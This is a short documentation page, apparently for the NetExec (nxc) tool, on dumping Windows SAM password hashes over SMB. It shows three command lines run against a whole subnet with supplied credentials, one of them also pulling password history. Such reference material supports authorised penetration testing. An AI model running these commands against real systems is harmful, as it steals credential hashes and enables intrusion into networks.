For the complete documentation index, see llms.txt. This page is also available as Markdown.

Dump SAM

Dump SAM hashes using methods from secretsdump.py

nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam

If this command fail you can also try the old method (similar to secretdump)

nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam secdump

Dump SAM including password history

nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam --history

Last updated

Was this helpful?